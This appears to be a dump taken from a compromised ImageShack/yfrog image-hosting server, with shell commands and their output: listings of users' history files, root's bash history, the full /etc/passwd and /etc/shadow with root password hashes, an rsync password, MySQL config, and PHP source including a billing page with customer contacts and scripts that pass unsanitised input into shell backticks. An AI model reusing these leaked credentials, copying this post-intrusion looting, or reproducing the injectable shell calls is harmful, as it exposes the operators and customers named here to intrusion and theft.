/home/image/www/write_imports2.php:if(in_array($columnArray['api_key'],$yfro
g_array)){
/home/image/www/write_imports2.php- $columnArray['from_api'] = 2;
/home/image/www/write_imports2.php-}
/home/image/www/write_imports2.php-
/home/image/www/write_imports2.php-$columnArray['source_country'] = $country
;
/home/image/www/write_imports2.php-$columnArray['upload_timestamp'] = time()
;
--
/home/image/www/write_imports_dev.php- if(eregi("@y",$partner)){ $yfrog_arra
y[] = $api_key; }
/home/image/www/write_imports_dev.php-}
/home/image/www/write_imports_dev.php-
/home/image/www/write_imports_dev.php-$cookie = $columnArray['registration_k
ey'];
/home/image/www/write_imports_dev.php-
/home/image/www/write_imports_dev.php:if(in_array($columnArray['api_key'],$y
frog_array)){
/home/image/www/write_imports_dev.php- $columnArray['from_api'] = 2;
/home/image/www/write_imports_dev.php-}
/home/image/www/write_imports_dev.php-
/home/image/www/write_imports_dev.php-
/home/image/www/write_imports_dev.php-$columnArray['upload_timestamp'] = tim
e();
# ls -alt /disk2
total 180626708
-rw-r--r-- 1 root root 1259520 Aug 22 09:00 csv_backups.tar
drwxrwxrwx 12 root root 20480 Aug 22 04:07 reports
drwxrwxrwx 6 root root 4096 May 20 23:05 .
drwxr-xr-x 29 root root 4096 May 20 23:05 ..
-rwxr-xr-x 1 root root 102386567518 Feb 20 2012 write_imports.file.bak
-rwxr-xr-x 1 root root 82393186001 Nov 26 2011 write_imports.file
drwxr-xr-x 2 root root 4096 Aug 19 2011 jira_dumps
-rw-r--r-- 1 root root 30096 Feb 15 2011 chrism.whitelist
drwx------ 2 root root 16384 Nov 12 2010 lost+found
drwxr-xr-x 3 root root 4096 Oct 29 2010 var
# ls -lat /home/*/.*hist*
-rw------- 1 jack users 7181 Aug 24 23:13 /home/jack/.bash_history
-rw------- 1 npettas users 37776 Aug 24 16:30 /home/npettas/.bash_history
-rw------- 1 msmirnov users 9861 Aug 24 14:59 /home/msmirnov/.bash_history
-rw------- 1 disotheb users 19463 Aug 22 17:32 /home/disotheb/.bash_history
-rw------- 1 root root 12908 Aug 6 14:42 /home/serge/.bash_history
-rw------- 1 moe users 629 Jul 26 17:26 /home/moe/.bash_history
-rw------- 1 edwin users 2421 Jul 25 12:02 /home/edwin/.bash_history
-rw------- 1 nagesh users 15 Apr 27 11:07 /home/nagesh/.bash_history
-rw------- 1 cwhite users 17688 Jan 6 2012 /home/cwhite/.bash_history
-rw------- 1 image image 27955 Dec 12 2011 /home/image/.bash_history
-rw------- 1 chrmaury users 1493 Sep 16 2011 /home/chrmaury/.bash_history
-rw------- 1 macbeth users 13329 Aug 8 2011 /home/macbeth/.bash_history
-rw------- 1 tyler users 379 Jul 29 2011 /home/tyler/.bash_history
-rw------- 1 sundar users 1531 Jul 15 2011 /home/sundar/.bash_history
-rw------- 1 root root 23694 Jul 1 2011 /home/chris/.bash_history
-rw------- 1 matt users 397 May 26 2011 /home/matt/.bash_history
-rw------- 1 rjoseph users 1934 May 2 2011 /home/rjoseph/.bash_history
-rw------- 1 janderso users 2224 Dec 4 2010 /home/janderso/.bash_history
-rw------- 1 jack users 18 Dec 1 2010 /home/jack/.mysql_history
-rw------- 1 chrmaury users 65 Nov 23 2010 /home/chrmaury/.mysql_history
-rw------- 1 root root 16 Nov 23 2010 /home/chris/.mysql_history
-rw------- 1 janderso users 39770 Nov 22 2010 /home/janderso/.mysql_history
-rw------- 1 rjoseph users 638 Nov 21 2010 /home/rjoseph/.mysql_history
-rw------- 1 cwhite users 366 Nov 12 2010 /home/cwhite/.mysql_history
-rw------- 1 macbeth users 265 Nov 12 2010 /home/macbeth/.mysql_history
-rw------- 1 disotheb users 282 Nov 9 2010 /home/disotheb/.mysql_history
-rw------- 1 edwin users 261 Nov 7 2010 /home/edwin/.history
-rw------- 1 lyolik users 2529 Sep 22 2010 /home/lyolik/.bash_history
-rw------- 1 npettas users 91 Jun 2 2010 /home/npettas/.mysql_history
# ls -lat /tmp
total 27466004
-rwxrwxrwx 1 apache apache 24452091228 Aug 25 10:58 500s.log
-rw-r--r-- 1 apache apache 3632308840 Aug 25 10:58 chmod_me.backup
drwxrwxrwt 4 root root 319488 Aug 25 10:58 .
-rw-r--r-- 1 root root 6 Aug 25 10:58 imageshack_mod_counte
r
-rw-r--r-- 1 root root 6 Aug 25 10:58 imageshack_total_coun
ter
-rw-r--r-- 1 root root 5 Aug 25 10:58 mobile_mod_counter
-rw-r--r-- 1 root root 6 Aug 25 10:58 total_mod_counter
-rw-r--r-- 1 root root 4 Aug 25 10:58 yfrog_mod_counter
-rw-r--r-- 1 root root 6 Aug 25 10:58 yfrog_total_counter
-rw-r--r-- 1 root root 2676920 Aug 25 10:50 values
-rw-r--r-- 1 npettas users 5136 Aug 25 10:45 out
-rwxrwxr-x 1 root root 0 Aug 25 10:41 test_cf_group
-rw-r--r-- 1 apache apache 17 Aug 25 09:59 pillspam.serial
-rw-r--r-- 1 root root 250 Aug 25 04:07 mobile-header.csv
-rw-r--r-- 1 root root 9190 Aug 25 04:07 mobile-sla.csv
-rw-r--r-- 1 root root 250 Aug 25 04:07 imageshack-header.csv
-rw-r--r-- 1 root root 8056 Aug 25 04:07 imageshack-sla.csv
-rw-r--r-- 1 root root 250 Aug 25 04:07 yfrog-header.csv
-rw-r--r-- 1 root root 14753 Aug 25 04:07 yfrog-sla.csv
-rw-r--r-- 1 root root 966 Aug 25 04:07 geo-header.csv
-rw-r--r-- 1 root root 286841 Aug 25 04:07 geo-is.csv
-rw-r--r-- 1 root root 238467 Aug 25 04:07 geo-yf.csv
-rw-r--r-- 1 root root 106 Aug 25 04:07 exts-header.csv
-rw-r--r-- 1 root root 36055 Aug 25 04:07 exts-uploads.csv
-rw-r--r-- 1 root root 1211 Aug 25 04:06 partners-header.csv
-rw-r--r-- 1 root root 248091 Aug 25 04:06 partners-uploads.csv
-rw-r--r-- 1 root root 24 Aug 25 04:06 regular-header.csv
-rw-r--r-- 1 root root 15551 Aug 25 04:06 regular-uploads.csv
-rw-r--r-- 1 root root 12431 Aug 25 04:06 untracked.log
-rw-r--r-- 1 root root 21714 Aug 25 04:06 import.success
-rw-r--r-- 1 root root 668 Aug 25 04:02 estimate.txt
-rw-r--r-- 1 root root 0 Aug 25 04:02 estimate_ghosts.txt
-rw-r--r-- 1 apache apache 29304 Aug 24 20:37 values.temp
-rw-r--r-- 1 apache apache 8609942 Aug 24 12:42 ad.log
-rw-r--r-- 1 apache apache 0 Aug 23 16:09 php_safelock_11
-rw-r--r-- 1 apache apache 0 Aug 23 16:08 php_safelock_4
-rw-r--r-- 1 apache apache 0 Aug 23 16:05 php_safelock_12
-rw-r--r-- 1 apache apache 0 Aug 23 16:03 php_safelock_2
-rw-r--r-- 1 apache apache 0 Aug 23 16:00 php_safelock_13
-rw-r--r-- 1 apache apache 0 Aug 23 15:57 php_safelock_3
-rw-r--r-- 1 apache apache 0 Aug 23 15:55 php_safelock_6
-rw-r--r-- 1 apache apache 0 Aug 23 15:53 php_safelock_8
-rw-r--r-- 1 apache apache 0 Aug 23 15:51 php_safelock_23
-rw-r--r-- 1 apache apache 0 Aug 23 15:49 php_safelock_15
-rw-r--r-- 1 apache apache 0 Aug 23 15:47 php_safelock_16
-rw-r--r-- 1 apache apache 0 Aug 23 15:25 php_safelock_19
-rw-r--r-- 1 apache apache 0 Aug 23 15:07 php_safelock_18
-rw-r--r-- 1 apache apache 0 Aug 23 14:59 php_safelock_0
-rw-r--r-- 1 apache apache 0 Aug 23 14:52 php_safelock_9
-rw-r--r-- 1 apache apache 0 Aug 23 14:19 php_safelock_24
-rw-r--r-- 1 apache apache 0 Aug 23 14:11 php_safelock_5
-rw-r--r-- 1 apache apache 0 Aug 23 14:01 php_safelock_17
-rw-r--r-- 1 apache apache 0 Aug 23 13:50 php_safelock_22
-rw-r--r-- 1 apache apache 0 Aug 23 13:11 php_safelock_10
-rw-r--r-- 1 apache apache 0 Aug 23 12:12 php_safelock_21
-rw-r--r-- 1 apache apache 0 Aug 23 12:10 php_safelock_7
-rw-r--r-- 1 apache apache 0 Aug 23 11:40 php_safelock_1
-rw-r--r-- 1 apache apache 463935 Aug 23 10:31 chmod_me_restore.back
up
-rw-r--r-- 1 apache apache 7641 Aug 23 10:25 %%C1^C18^C1877CA3%%se
arch_round.tpl.php
-rw-r--r-- 1 apache apache 12699 Aug 23 10:25 %%CB^CBD^CBD4D516%%na
vigation_round.tpl.php
-rw-r--r-- 1 apache apache 27097 Aug 23 10:25 %%CC^CC2^CC22DAC9%%he
ader_round.tpl.php
-rw-r--r-- 1 apache apache 0 Aug 23 10:19 php_safelock_20
-rw-r--r-- 1 apache apache 0 Aug 23 09:34 php_safelock_14
-rw------- 1 root root 0 Aug 22 18:21 changed-rjoseph-20091
113
-rw-r--r-- 1 apache apache 9066 Aug 22 15:02 %%8F^8F9^8F908A45%%lo
gin-dialog.tpl.php
-rw-r--r-- 1 apache apache 19307 Aug 22 15:02 %%F4^F43^F433A22E%%fo
oter_round.tpl.php
-rw-r--r-- 1 apache apache 19667 Aug 22 15:02 %%E2^E27^E27C4F30%%he
ader_round_tools.tpl.php
drwxr-xr-x 2 msmirnov users 4096 Aug 22 12:02 backup_reg_domains
-rw-r--r-- 1 apache apache 62 Aug 22 10:30 504s.log
-rw-r--r-- 1 apache apache 58564 Aug 18 09:04 effective_tld_names.d
at
srwxr-xr-x 1 apache apache 0 Jul 3 10:09 php.sock
drwxr-xr-x 29 root root 4096 May 20 23:05 ..
drwxrwxrwt 2 root root 4096 Jan 6 2012 .ICE-unix
prw-r--r-- 1 root root 0 Aug 15 2009 .lighttpd_file_reques
ts_pipe
prw-r--r-- 1 root root 0 Aug 15 2009 .lighttpd_referrer_pi
pe
# cat /root/.bash_history|grep -v write_imports.file|sort|uniq
/data/imageshack/packages/file-deletion/bin/DeletionStatus
/data/imageshack/packages/file-deletion/bin/DeletionStatus retries
cd /data/imageshack/packages/file-deletion/
./home/image/crons_stream/bin/count_deletion_
/bin/sh /home/image/crons_stream/bin/check_deletion.sh
/bin/sh /home/image/crons_stream/bin/check_mod_insert.sh
:q!
cat "/data/imageshack/packages/file-deletion/bin/DeletionStatus"*batch
cat "/data/imageshack/packages/file-deletion/bin/DeletionStatus"*batch 2> /d
ev/null
cat "/data/imageshack/packages/file-deletion/bin/DeletionStatus"*batch 2> /d
ev/null | wc -l | cut -f1 -d' '
cat "/data/imageshack/packages/file-deletion/bin/DeletionStatus*batch
cat "/data/imageshack/packages/file-deletion/deletion_queue/"*batch* 2> /dev
/null | wc -l | cut -f1 -d' '
cat $deletion_queuefail* 2> /dev/null
cat $deletion_queuefail* 2> /dev/null | wc -l | cut -f1 -d' '
cat /data/imageshack/packages/file-deletion/bin/DeletionStatus*batch
cat /data/imageshack/packages/file-deletion/deletion_queue/
cat /data/imageshack/packages/file-deletion/deletion_queue/*
cat /data/imageshack/packages/file-deletion/deletion_queue/* | wc -l
cat /data/imageshack/packages/file-deletion/deletion_queue/*batch* 2> /dev/n
ull
cat /data/imageshack/packages/file-deletion/deletion_queue/*batch* | wc -l
cat /data/imageshack/packages/file-deletion/deletion_queue/.* | wc -l
cat /data/imageshack/packages/file-deletion/deletion_queue/.*batch
cat /data/imageshack/packages/file-deletion/deletion_queue/.*batch | wc -l
cat /data/imageshack/packages/file-deletion/deletion_queue/.*batch*
cat /data/imageshack/packages/file-deletion/deletion_queue/.*batch* 2> /dev/
null
cat /data/imageshack/packages/file-deletion/deletion_queue/.*batch* | wc -l
cat /data/imageshack/packages/file-deletion/deletion_queue/fail*
cat /data/imageshack/packages/file-deletion/deletion_queue/fail* 2>
cat /data/imageshack/packages/file-deletion/deletion_queue/fail* 2> /dev/nul
l | wc -l
cat /data/imageshack/packages/file-deletion/deletion_queue/failedFiles-13375
75716 | wc -l
cat 18-48.file
cat 18-48.file | sort | uniq | wc -l && wc -l 18-48.file
cat porn
cd
cd cd /data/imageshack/packages/file-deletion/
cd ..
cd /data/imageshack/packages/file-deletion/
cd /dev/shm/
cd /disk2
cd /disk2/reports/
cd /disk2/reports/hbase_insert
cd /disk2/reports/mobile/
cd /disk2/stream
cd /etc/rc.d/init.d/
cd /home/image/crons_stream/bin/
cd /home/image/www
cd /home/image/www/
cd /tmp
cd /usr/log/ht
cd /var/log
cd /var/log/
cd /var/log/httpd/
cd /var/spool/cron/
cd 05-09-12
cd 05-10-12
cd 05-15-12
cd 05-16-12
cd 05-27-12
cd config/
cd deletion_queue/
cd httpd/
cd mobile/
cd reports/
chattr + root
chattr +i /var/spool/cron/root
chattr +i root
chattr -+ root
chattr -i /var/spool/cron/root
chattr -i root
cp yfrog3_subscribe.log yfrog3_subscribe.log.120804
cp yfrog3_subscribe.log yfrog3_subscribe.log.120805
cp yfrog3_subscribe.log yfrog3_subscribe.log.120807
cp yfrog3_subscribe.log yfrog3_subscribe.log.120810
cp yfrog3_subscribe.log yfrog3_subscribe.log.120813
cp yfrog3_subscribe.log yfrog3_subscribe.log.120819
cp yfrog3_subscribe.log yfrog3_subscribe.log.120822
crontab -l
crontab -l
df -h
df -h .
dmesg
dmidecode | grep Product
du -sh
echo "" > yfrog3_subscribe.log
echo "" > haproxy.log
echo "" > yfrog3_subscribe.log
exit
fdisk -l | grep 'Disk /'
file /dev/shm
file /dev/shm/haproxy.log
for z in a b ; do echo /dev/sd$z ; smartctl -a -data /dev/sd$z | egrep '^Se
r|Model|^ 5|^197|^198|^199' ; echo ; done
grep rafale3.png *.file
history | grep cd
ifconfig
kill 8979
l s-ltra
last
last | head
less yfrog3_subscribe.log
less yfrog3_subscribe.log
less yfrog3_subscribe.log
ls
ls -l
ls -l
ls -l /dev/shm/haproxy.log
ls -l | grep -v yfrog
ls -l | grep 2012-08-15
ls -lh /dev/shm/haproxy.log
ls -lh | grep 2012-08-15
ls -ltr
ls -ltra
ls -ltra *.file
ls -ltrah
ls -tlra
ls .
ls /dev/shm
ls /disk2
ls /disk2/reports/hbase_insert/
ls /var/spool/cron/root
ls deletion_queue/.*batch
ls ltra
more keys
more yfrog3_subscribe.log
php InsertIntoHbase.php
php verifyHbaseInsert.php
ps aux | grep 8979
ps aux | grep Multi
ps aux | grep MultiThreadDeletion.php
ps aux | grep MultiThreadDeletion.php | grep -v grep
ps aux | grep MultiThreadDeletion.php | grep -v grep | wc -l
ps aux | grep deletion
ps aux | grep deletion | wc -l
ps aux | grep sert
ps uax | grep multi
server_roles.py mtaj13
service InsertIntoHbase restart
service InsertIntoHbase status
sh /home/image/crons_stream/bin/count_deletion_queue_waits
sh /home/image/crons_stream/bin/DeletionStatus
sh /home/image/crons_stream/bin/count_deletion_fails
sh /home/image/crons_stream/bin/count_deletion_fails 2> /dev/null
sl -ltra
smartctl -a -data /dev/sda | less
ssh img511
su - disotheb
sudo /etc/init.d/InsertIntoHbase restart
sudo /etc/init.d/InsertIntoHbase stop
sudo /etc/init.d/deletion start
sudo /etc/init.d/deletion stop
sudo /etc/init.d/deletion/start
sudo /etc/init.d/deletion/stop
sudo cp /home/image/crons_stream/bin/count_deletion_fails /home/image/cron
s_stream/bin/count_deletion_queue_waits
sudo cp /home/image/crons_stream/bin/DeletionStatus /data/imageshack/package
s/file-deletion/bin/
sudo cp /home/image/crons_stream/bin/check_deletion.sh /home/image/crons_str
eam/bin/count_deletion_fails
sudo cp /home/image/crons_stream/bin/count_deletion_fails /home/image/crons
_stream/bin/DeletionStatus
sudo su - disotheb
sudo vim /data/imageshack/packages/file-deletion/bin/DeletionStatus
sudo vim /data/imageshack/packages/file-deletion/bin/FileDeletion.php
sudo vim /data/imageshack/packages/file-deletion/bin/MultiThreadDeletion.php
sudo vim /home/image/crons_stream/bin/DeletionStatus
sudo vim /home/image/crons_stream/bin/check_mod_insert.sh
sudo vim /home/image/crons_stream/bin/count_deletion_fails
sudo vim /home/image/crons_stream/bin/count_deletion_fails 2> /dev/null
sudo vim /home/image/crons_stream/bin/count_deletion_queue_waits
sudo vim /home/image/v
sudo vim /root/bin/mysql_logger.sh
sudo vim bin/FileDeletion.php
sudo vim bin/MUu
tail -1000000 imageshack.us | grep " 500 "
tail -100000f /var/log/httpd/imageshack.us | grep insert_to_queue.php
tail -1000f /var/log/httpd/yfrog3_subscribe.log
tail -1000f imageshack.us | grep " 500 "
tail -f /tmp/500s.log
tail -f /var/log/httpd/InsertIntoHbase.log
tail -f /var/log/httpd/deletion.log
tail -f /var/log/httpd/imageshack.us
tail -f /var/log/httpd/imageshack.us | grep insert_to_queue.php
tail -f /var/log/httpd/php_error.log
tail -f /var/log/httpd/yfrog3_subscribe.log
tail -f 500s.log
tail -f InsertIntoHbase.log
tail -f deletion.log
tail -f imageshack.us
tail -f imageshack.us | grep " 500 "
tail -f imageshack.us | grep 500
tail -f write_import.f
tail -f yfrog3_subscribe.log
tail -n 1000 /tmp/500s.log
tail -n 10000 /tmp/500s.log
tail /dev/shm/haproxy.log
tail /disk2/reports/hbase_insert/nohup.out
tail /var/log/httpd/unsubscribed.log
tcpdump -n port 8080 -A -s0
tial -f imageshack.us
tls -ltrah
top
uname -a
uname -a ; dmidecode | grep Product
vim /data/imageshack/packages/file-deletion/bin/DeletionStatus
vim /home/image/alerts.php
vim /home/image/crons_stream/bin/DeletionStatus
vim /home/image/crons_stream/bin/InsertIntoHbase.php
vim /home/image/crons_stream/bin/scan_porn.php
vim /home/image/www
vim /home/image/www/500.php
vim /home/image/www/content.php
vim /home/image/www/en/error.php
vim /tmp/500s.log
vim /usr/local/bin/allow_host.py
vim /var/spool/cron/root
vim InsertIntoHbase.php
vim bin/DeletionStatus
vim config.ini
vim image
vim root
vim verifyHbaseInsert.php
vim yfrog3_subscribe.log
w
wc -l yfrog3_subscribe.log
wc -l *.file
wc -l /var/log/httpd/yfrog3_subscribe.log
wc -l yfrog3_subscribe.log
wc -l yfrog3_subscribe.log
wc -l yfrog3_subscribe.log.120804
wc yfrog3_subscribe.log
wc yfrog3_subscribe.log
# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
avahi-autoipd:x:499:499:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:498:497:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
nutch:x:710:100::/home/nutch:/bin/bash
image:x:500:1000::/home/image:/bin/bash
video:x:700:7000::/home/video:/bin/bash
gmond:x:516:516:Ganglia Monitor Daemon:/var/lib/ganglia:/sbin/nologin
jack:x:520:100::/home/jack:/bin/bash
macbeth:x:503:100::/home/macbeth:/bin/bash
lord:x:504:100::/home/lord:/bin/tcsh
cwhite:x:519:100::/home/cwhite:/bin/bash
lyolik:x:518:100::/home/lyolik:/bin/bash
disotheb:x:506:100::/home/disotheb:/bin/bash
janderso:x:507:100::/home/janderso:/bin/bash
rjoseph:x:508:100::/home/rjoseph:/bin/bash
npettas:x:512:100::/home/npettas:/bin/bash
ganglia:x:496:498:Ganglia Monitoring System:/var/lib/ganglia:/sbin/nologin
chris:x:521:100::/home/chris:/bin/bash
leo:x:711:100::/home/leo:/bin/bash
edwin:x:522:100::/home/edwin:/bin/bash
msmirnov:x:714:100::/home/msmirnov:/bin/bash
build:x:715:715::/home/build:/bin/bash
moe:x:725:100::/home/moe:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
root:$1$gQ5eTV9K$EejhJfWSmlZhODzygiTmt/:15575:0:99999:7:::
bin:*:14469:0:99999:7:::
daemon:*:14469:0:99999:7:::
adm:*:14469:0:99999:7:::
lp:*:14469:0:99999:7:::
sync:*:14469:0:99999:7:::
shutdown:*:14469:0:99999:7:::
halt:*:14469:0:99999:7:::
mail:*:14469:0:99999:7:::
uucp:*:14469:0:99999:7:::
operator:*:14469:0:99999:7:::
games:*:14469:0:99999:7:::
gopher:*:14469:0:99999:7:::
ftp:*:14469:0:99999:7:::
nobody:*:14469:0:99999:7:::
avahi-autoipd:!!:14469:0:99999:7:::
vcsa:!!:14469:0:99999:7:::
ntp:!!:14469:0:99999:7:::
dbus:!!:14469:0:99999:7:::
polkituser:!!:14469:0:99999:7:::
nscd:!!:14469:0:99999:7:::
tcpdump:!!:14469:0:99999:7:::
avahi:!!:14469:0:99999:7:::
mailnull:!!:14469:0:99999:7:::
smmsp:!!:14469:0:99999:7:::
apache:!!:14469:0:99999:7:::
sshd:!!:14469:0:99999:7:::
torrent:!!:14469:0:99999:7:::
haldaemon:!!:14469:0:99999:7:::
nutch:!!:14471:0:99999:7:::
image:$1$gQ5eTV9K$EejhJfWSmlZhODzygiTmt/:15575:0:99999:7:::
video:!!:14471:0:99999:7:::
gmond:!!:14471:0:99999:7:::
jack:!!:14471:0:99999:7:::
macbeth:!!:14471:0:99999:7:::
lord:!!:14471:0:99999:7:::
cwhite:!!:14471:0:99999:7:::
lyolik:!!:14471:0:99999:7:::
disotheb:!!:14471:0:99999:7:::
janderso:!!:14755:0:99999:7:::
rjoseph:!!:14471:0:99999:7:::
npettas:!!:14471:0:99999:7:::
ganglia:!!:14471::::::
chris:!!:14476:0:99999:7:::
leo:!!:14671:0:99999:7:::
edwin:!!:14671:0:99999:7:::
msmirnov:!!:14671:0:99999:7:::
build:!!:14746:0:99999:7:::
moe:!!:14746:0:99999:7:::
mysql:!!:14759::::::
sundar:!!:14819:0:99999:7:::
matt:!!:14819:0:99999:7:::
chrmaury:!!:14819:0:99999:7:::
wes:!!:14819:0:99999:7:::
tyler:!!:14860:0:99999:7:::
allan:!!:15167:0:99999:7:::
serge:!!:15188:0:99999:7:::
nagesh:!!:15205:0:99999:7:::
josiah:!!:15292:0:99999:7:::
david:!!:15384:0:99999:7:::
# cat /etc/ntp.conf
#############################
# cfengine 11/17/2010 (rjoseph)
server ntp1.imageshack.us
server ntp2.imageshack.us
restrict default kod nomodify notrap nopeer
restrict 127.0.0.1
# cat /etc/dfs-rsync-passwd
aHi3371S^asa55asSSD
# cat /etc/my.cnf
[mysqld]
datadir=/disk2/var/lib/mysql
socket=/disk2/var/lib/mysql/mysql.sock
user=mysql
innodb_file_per_table
max_binlog_size = 350M
log-bin=mysql-bin
server-id=78254
relay-log=localhost-relay-bin
user=mysql
old_passwords=1
expire_logs_days=3
max_connect_errors = 1000
max_connections = 500
group_concat_max_len=16K
max_allowed_packet=16M
thread_cache_size=300
sort_buffer_size=300M
read_rnd_buffer_size=10M
innodb_thread_concurrency=16
innodb_log_file_size=100M
innodb_buffer_pool_size=3400M
innodb_flush_method=O_DIRECT
innodb_flush_log_at_trx_commit=0
query-cache-size=200M
query_cache_limit = 40M
key_buffer_size=100M
myisam-recover
log=/var/log/mysqld.log
log_slow_queries=/var/log/slow-queries.log
long_query_time=1
table_cache = 1500
max_heap_table_size = 128M
tmp_table_size = 384M
[mysqld_safe]
log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid
# cat /home/image/www/en/billing.php
<?php
$customer[akanoc] = 1452;
$customer[bebo] = 1297;
$info[akanoc] = "Akanoc DCS Pacific Star, LLC 501 Seaport Court, Suite #207
Redwood City, CA 94063 billing@dcsmanage.com $4.00";
$info[bebo] = "Bebo, Inc. 425 Bush Street Suite 200 San Francisco, CA 94108
aren@beboinc.com, accounting@beboinc.com $5.00";
$month = array(1,2,3,4,5,6,7,8,9,10,11,12);
$year = array(2010,2011,2012,2013,2014);
if(!$date){ $date = date("n/Y",mktime(0,0,0,date(n),0,date(Y))-28*24*60*60);
}
list($m,$y) = explode("/",$date);
if(!in_array($m,$month) || !in_array($y,$year)) { exit("wrong date"); }
$start = mktime(0,0,0,$m,1,$y);
$end_day = date(t,$start);
$end = mktime(23,59,59,$m,$end_day,$y);
echo "<p>Customer Billing for <b>$date</b>. Circle the 95th percentile value
and multiply according to the following schedule.</p>";
foreach($customer as $name => $id){
$id = trim($id);
$url = "http://mpmon1.imageshack.us/cacti/graph_image.php?local_graph_id=$i
d&rra_id=0&view_type=tree&graph_start=$start&graph_end=$end";
$wget = str_replace("&","\&",$url);
`wget -O /tmp/$name.png $wget`;
`cp /tmp/$name.png /home/image/www/en/$name.png`;
$debug .= "<br />".$info[$name]."<br /><img src=/en/$name.png /><br />";
echo "<span style=\"font-family: Courier; font-size: 1.1em;\">$name</span><
span style=\"display:block; margin-right: 5px; width: 110px; height: 18px; b
ackground-image: url(http://stream.imageshack.us/en/$name.png); background-p
osition: -660px -400px; background-repeat: no-repeat;\"></span> \n";
}
echo $debug;
exit;
?>
# cat /home/image/www/en/evilporn.php
<?php
include('thfun.php');
$data = ` tail -$amount /home/image/www/lolita | sort | uniq`;
$galleries = explode ("\n", $data);
foreach($galleries as $evil){
$evil = trim($evil);
$evil = thumbnail($evil);
echo "<a href=\"$b\" target=\"_blank\"><img src=\"$thumb\" /></a> \n";
}
?>
# cat /home/image/www/en/galleryadmin.php
<?php
include('thfun.php');
$data = ` tail -$amount /home/image/www/bad.log | sort | uniq`;
$galleries = explode ("\n", $data);
foreach($galleries as $evil){
$evil = trim($evil);
$evil = thumbnail($evil);
echo "<a href=\"$gal_url\" target=\"_blank\"><img src=\"$thumb\" /></a> \n";
}
?>
# cat /home/image/crons_stream/bin/InsertIntoHbase.php
<?
/**
* Sets mod flags on moderated images in hbase
*
* Grabs files from /disk2/reports/needsHbaseInsert
* Sets table 'uploaded_hbase' column 'at:rev' to 1 for moderated non-porn
* Sets to 666 for porn
*
* This script should run in crontab ever few minutes
*
* @author Npettas
*
*/
ini_set("memory_limit","1G");
$hbaseInsert = new InsertIntoHbase;
$hbaseInsert->run();
class InsertIntoHbase
{
const CURL_CONNECT_TIMEOUT = 5;
const CURL_TIMEOUT = 30;
const HBASE_MODERATED_QUEUE = '/disk2/reports/hbase_insert/moderated';
const HBASE_MODERATED_QUEUE_TMP = '/disk2/reports/hbase_insert/moderated
.temp';
const HBASE_PORN_QUEUE = '/disk2/reports/hbase_insert/porn';
const HBASE_PORN_QUEUE_TMP = '/disk2/reports/hbase_insert/porn.temp';
const MAX_FILES = 1000;
const API_URL = "http://mtju1:8080/imageshack/image/add_bulk_mod";
//const API_URL = "http://api.yfrog.com/imageshack/image/add_bulk_mod";
const OVERRIDE = "true";
private $modFiles;
private $pornFiles;
private $pornBatches;
private $modBatches;
private $jsonData;
private $urlIndex = 0;
public function run()
{
while (1) {
// Wait for queues
while(filesize(self::HBASE_MODERATED_QUEUE) == 0 && filesize(sel
f::HBASE_PORN_QUEUE) == 0) {
clearstatcache();
sleep(5);
}
// Grab files
if ($this->getFiles()) {
echo "Grabbing file to insert in to hbase..\n";
} else {
sleep(3);
continue;
}
// Clean files
if ($this->cleanList()) {
echo "Cleaned file lists.\n";
} else {
sleep(3);
continue;
}
// Split into batches
echo "Splitting files into batches...\n";
$this->splitBatches($this->modFiles, "mod");
$this->splitBatches($this->pornFiles, "porn");
// Generate urls
echo "Generating URLs..\n";
$this->generateUrls();
// Insert into hbase
echo "Preforming curls..\n";
$this->multiInsert();
// CLear all arrays
$this->urlIndex = 0;
unset($this->modBatches);
unset($this->modFiles);
unset($this->pornBatches);
unset($this->pornFiles);
unset($this->jsonData);
}
}
/**
* Gets files in hbase insert queue
*/
private function getFiles()
{
// Get file contents
$this->modFiles = explode("\n", file_get_contents(self::HBASE_MODERA
TED_QUEUE));
$this->pornFiles = explode("\n", file_get_contents(self::HBASE_PORN_
QUEUE));
// Clear file contents
//file_put_contents(self::HBASE_PORN_QUEUE_TMP, implode("\n", $this-
>pornFiles), FILE_APPEND);
//file_put_contents(self::HBASE_MODERATED_QUEUE_TMP, implode("\n", $
this->modFiles), FILE_APPEND);
file_put_contents(self::HBASE_PORN_QUEUE, "");
file_put_contents(self::HBASE_MODERATED_QUEUE, "");
if(count($this->modFiles) > 1 || count($this->pornFiles) > 1) {
return true;
} else {
return false;
}
}
/**
* Delete temp files
*/
private function deleteTemps()
{
file_put_contents(self::HBASE_MODERATED_QUEUE_TMP, "");
file_put_contents(self::HBASE_PORN_QUEUE_TMP, "");
}
/**
* Thread limiter
*/
private function threadLimit()
{
// Return false if too many processes already running
if (`ps aux | grep InsertIntoHbase.php | grep -v grep | wc -l` > se
lf::MAX_THREADS) {
return false;
}
return true;
}
/**
* Cleans moderated file list
*/
private function cleanList()
{
foreach($this->modFiles as $file){
// extract filename and server (ex: 614-gxvjn.jpg)
$file = explode(',', $file);
